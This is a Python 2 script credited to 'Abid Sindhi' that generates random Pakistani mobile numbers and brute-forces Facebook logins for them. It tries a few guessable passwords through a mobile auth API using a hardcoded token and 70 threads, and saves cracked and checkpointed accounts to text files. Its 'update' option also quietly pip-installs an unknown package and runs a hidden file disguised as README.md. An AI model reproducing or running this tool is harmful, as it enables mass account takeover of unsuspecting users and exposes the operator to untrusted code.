#!/usr/bin/python2
#coding=utf-8
#Auther AbidSindhi786
#MOMAFIKO SE DOOR HO AKILA HI MASHOOR HOO...


import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(50000):
 
    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')
 
    print(nmbr)
 
    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install requests')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')
    time.sleep(1)
    os.system('pip2 install futures')
    
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
 
 
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
	print '[!] Exit'
	os.sys.exit()
 
def psb(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.03)
 
def t():
    time.sleep(1)
def cb():
    os.system('clear')
##### Dev : ABID SINDHI786
##### LOGO #####
logo='''
\x1b[1;92m .d8b.  d8888b. d888888b d8888b. 
\x1b[1;92md8' `8b 88  `8D   `88'   88  `8D 
\x1b[1;97m88ooo88 88oooY'    88    88   88 
\x1b[1;98m88~~~88 88~~~b.    88    88   88 
\x1b[1;94m88   88 88   8D   .88.   88  .8D 
\x1b[1;94mYP   YP Y8888P' Y888888P Y8888D' 
                                                                                                                                          
\033[1;90m [ MONAFIKO SE DOOR HO AKILA HI MASHOR HO ]

\x1b[1;92m=============================
\x1b[1;97m FB youtube : ABID SINDHI786
\x1b[1;97m Contect  : 03400026596
\x1b[1;97m FaceBook : ABID SINDHI
\x1b[1;97m Author : Abid Sindhi
\x1b[1;92m=============================
\x1b[1;937m NOTE ! use flight (airplane) mode before use
\x1b[1;91m=======================================
\x1b[1;937m  8 DIN BAD CP IDZ 100 M 80 OPIN OR FUL SPEED
\x1b[1;91m======================================= '''                                                                                                                                                                                                                                                                                                                                                  

CorrectUsername = "abid"
CorrectPassword = "sindhi"
 
loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;97m\x1b[1;91mTool Username \x1b[1;97m»» \x1b[1;97m")
    if (username == CorrectUsername):
    	password = raw_input("\033[1;97m \x1b[1;91mTool Password  \x1b[1;97m» \x1b[1;97m")
        if (password == CorrectPassword):
            print "Logged in successfully as " + username #Dev:ABIDSINDHI786
	    time.sleep(2)
            loop = 'false'
        else:
            print "\033[1;94mWrong Password"
            os.system('xdg-open https://www.facebook.com/ABIDSINDHI786110')
    else:
        print "\033[1;94mWrong Username"
        os.system('xdg-open https://www.facebook.com/ABIDSINDHI786110')


back = 0
successful = []
cpb = []
oks = []
id = []
def menu():
	os.system('clear')
	print logo
	print "\033[1;92m         [ ABIDSINDHI786 { MONAFIKO SE DOOR HO AKILA HI MASHOR HO } ]"
	print
        print "\033[1;91m          SELECT ANY ONE SIM NETWORK"
	print "\033[1;92m[1]\033[1;97m╼╼\033[1;97mMOBILINK     (Press 1)"
	print "\033[1;92m[2]\033[1;97m╼╼\033[1;97mTELENOR      (Press 2)"
	print "\033[1;92m[3]\033[1;97m╼╼\033[1;97mWARID        (Press 3)"
	print "\033[1;92m[4]\033[1;97m╼╼\033[1;97mUFONE        (Press 4)"
	print "\033[1;92m[5]\033[1;97m╼╼\033[1;97mZONG         (Press 5)"
	print "\033[1;92m[6]\033[1;97m╼╼\033[1;97mUPDATE SYSTEM"
	print "\033[1;92m[0]\033[1;97m╼╼\033[1;91mEXIT   (Back) "	    
	print 50*'\033[1;90m-'
	action()
	
def action():	
	bch = raw_input('\n\033[1;92mSELECT ANY ONE NETWORK NUMBER \033[1;95m▶▶▶▶▶ \033[1;97m ')
	if bch =='':
		print '[!] Fill in correctly'
		action()
	elif bch =="1":
		os.system("clear")
		print (logo)
		print "\033[1;97m\x1b[1;92mMOBILINK/JAZZ CODE HERE\x1b[1;92m◈◈◈◈◈"		
		print "\033[1;97m00, 01, 02, 03, 04,"
		print "\033[1;97m05, 06, 07, 08, 09,"
		try:
			c = raw_input(" \033[1;97m◢◀\x1b[1;92mSELECTED ANYONE CODE\x1b[1;97m▶◣ \033[1;97m:\033[1;97m ")
			k="+923"
			idlist = ('.txt')
			for line in open(idlist,"r").readlines():
				id.append(line.strip())
		except IOError:
			print ("[!] File Not Found")
			raw_input("\n[ Back ]")
			menu()
	elif bch =="2":			
		os.system("clear")
		print (logo)
		print "\033[1;91m\033[1;92mTELENOR CODE HERE\x1b[1;92m◈◈◈◈◈"		
		print "\033[1;91m40, 41, 42, 43, 44,"
		print "\033[1;91m45, 64, ??, ??, ??,"
		try:
			c = raw_input(" \033[1;91m◢◀\x1b[1;92mSELECTED ANYONE CODE\x1b[1;91m▶◣ \033[1;97m: \033[1;97m")
			k="+923"
			idlist = ('.txt')
			for line in open(idlist,"r").readlines():
				id.append(line.strip())
		except IOError:
			print ("[!] File Not Found")
			raw_input("\n[ Back ]")
			menu()
	elif bch =="3":			
		os.system("clear")
		print (logo)
		print "\033[1;91m\033[1;92mWARID CODE HERE\x1b[1;92m◈◈◈◈◈"		
		print "\033[1;91m20, 21, 22, 23,"
		print "\033[1;91m24, ??, ??, ??,"
		try:
			c = raw_input(" \033[1;91m◢◀\x1b[1;92mSELECTED ANYONE CODE\x1b[1;91m▶◣ \033[1;97m: \033[1;97m")
			k="+923"
			idlist = ('.txt')
			for line in open(idlist,"r").readlines():
				id.append(line.strip())
		except IOError:
			print ("[!] File Not Found")
			raw_input("\n[ Back ]")
			menu()	
	elif bch =="4":			
		os.system("clear")
		print (logo)
		print "\033[1;91m\033[1;92mUFONE CODE HERE\x1b[1;92m◈◈◈◈◈"		
		print "\033[1;91m31, 32, 33, 34,"
		print "\033[1;91m35, 36, 37, ??,"
		try:
			c = raw_input(" \033[1;91m◢◀\x1b[1;92mSELECTED ANYONE CODE\x1b[1;91m▶◣ \033[1;97m: \033[1;97m")
			k="+923"
			idlist = ('.txt')
			for line in open(idlist,"r").readlines(): 
				id.append(line.strip())
		except IOError:
			print ("[!] File Not Found")
			raw_input("\n[ Back ]")
			menu()	
	elif bch =="5":			
		os.system("clear")
		print (logo)
		print "\x1b[1;91m\033[1;92mZONG CODE HERE\x1b[1;92m◈◈◈◈◈"		
		print "\033[1;91m10, 11, 12, 13,"
		print "\033[1;91m14, 15, 16, 17,"
		try:
			c = raw_input(" \033[1;91m◢◀\x1b[1;92mSELECTED ANYONE CODE\x1b[1;91m▶◣ \033[1;97m: \033[1;97m")
			k="+923"
			idlist = ('.txt')
			for line in open(idlist,"r").readlines():
				id.append(line.strip())
		except IOError:
			print ("[!] File Not Found")
			raw_input("\n[ Back ]")
			menu()
	elif bch =="6":
	    os.system("clear")
	    os.system("pip2 install --upgrade balln")
	    os.system("pip2 install --upgrade balln")
	    os.system("clear")
	    print(logo)
	    print
	    psb (" This Tool has been successfully updated")
	    time.sleep(2)
	    os.system("python2 .Abidsindhi.xo")
#	elif chb =='3':	
#	    os.system('xdg-open https://www.facebook.com/ABIDSINDHI786110')
#	    time.sleep(1)
#	    menu()
	elif bch =='0':
		exb()
	else:
		print '[!] Fill in correctly'
		action()
 
	xxx = str(len(id))
	psb ('[✓] \033[1;96mTotal Numbers: '+xxx)
	time.sleep(0.5)
	psb ('[✓] \033[1;96mPlease wait, process is running ...')
	time.sleep(0.5)
	psb ('[✓] \033[1;96mif U show No Result Use 5 Second Airplane Mode ...')
	time.sleep(0.5)
	psb ('[!] \033[1;96mPress CTRL Then Press Z To Stop This Process')
	time.sleep(0.5)
	print 50*'\033[1;90m-'
	print
	
			
	def main(arg):
		global cpb,oks
		user = arg
		try:
			os.mkdir('save')
		except OSError:
			pass
		try:
			pass1 = user
			data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
			q = json.load(data)
			if 'access_token' in q:
				print '\x1b[1;92m[ ABID=OK ]\x1b[1;92m-\x1b[1;92m(u)\x1b[1;92m-' + k + c + user + '-\x1b[1;92m(p)\x1b[1;92m-' + pass1																				
				okb = open('save/successfull.txt', 'a')
				okb.write(k+c+user+'|'+pass1+'\n')
				okb.close()
				oks.append(c+user+pass1)
			else:
				if 'www.facebook.com' in q['error_msg']:
					print '\x1b[1;97mABID- \x1b[1;97m[CP]\x1b[1;97m-\x1b[1;97m[user]\x1b[1;97m-' + k + c + user + '-\x1b[1;97m[pass]\x1b[1;97m-' + pass1
					cps = open('save/checkpoint.txt', 'a')
					cps.write(k+c+user+'|'+pass1+'\n')
					cps.close()
					cpb.append(c+user+pass1)
				else:	
					pass2 = 'name123'
					data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
			                q = json.load(data)
					if 'access_token' in q:
		                        	print '\x1b[1;92m[ ABID=OK ]\x1b[1;92m-\x1b[1;92m(u)\x1b[1;92m-' + k + c + u + '-\x1b[1;92m(p)\x1b[1;92m-' + k + c + u + '-\x1b[1;93m✙\x1b[1;91m-' + pass2                            											
						okb = open('save/successfull.txt', 'a')
						okb.write(k+c+user+'|'+pass2+'\n')
						okb.close()
						oks.append(c+user+pass2)
					else:	
						if 'www.facebook.com' in q['error_msg']:
							print '\x1b[1;97mABID- \x1b[1;97m[CP]\x1b[1;97m-\x1b[1;97m[user]\x1b[1;97m-' + k + c + u + '-\x1b[1;97m[pass]\x1b[1;97m-' + pass2
							cps = open('save/checkpoint.txt', 'a')
							cps.write(k+c+user+'|'+pass2+'\n')
							cps.close()
							cpb.append(c+user+pass2)
						else:	
							pass3 = '786786786'
							data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
			                                q = json.load(data)
							if 'access_token' in q:
								print '\x1b[1;92m[ ABID=OK ]\x1b[1;92m-\x1b[1;92m(u)\x1b[1;92m-' + k + c + u + '-\x1b[1;92m(p)\x1b[1;92m-' + pass3
								okb = open('save/successfull.txt', 'a')
								okb.write(k+c+user+'|'+pass3+'\n')
								okb.close()
								oks.append(c+user+pass3)
							else:	
								if 'www.facebook.com' in q['error_msg']:
									print '\x1b[1;97mABID- \x1b[1;97m[CP]\x1b[1;97m-\x1b[1;97m[user]\x1b[1;97m-' + k + c + user + '-\x1b[1;97m[pass]\x1b[1;97m-' + pass3
									cps = open('save/checkpoint.txt', 'a')
									cps.write(k+c+user+'|'+pass3+'\n')
									cps.close()
									cpb.append(c+user+pass3)
								
							
		except:
			pass
		
	p = ThreadPool(70)
	p.map(main, id)
	print 50*'-'
	print '[✓] Process Has Been Completed ....'
	print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
	print('[✓] CP File Has Been Saved : save/checkpoint.txt')
	raw_input('\n[Press Enter To Go Back]')
	os.system('python2 .README.md')
		
if __name__ == '__main__':
	menu()
	





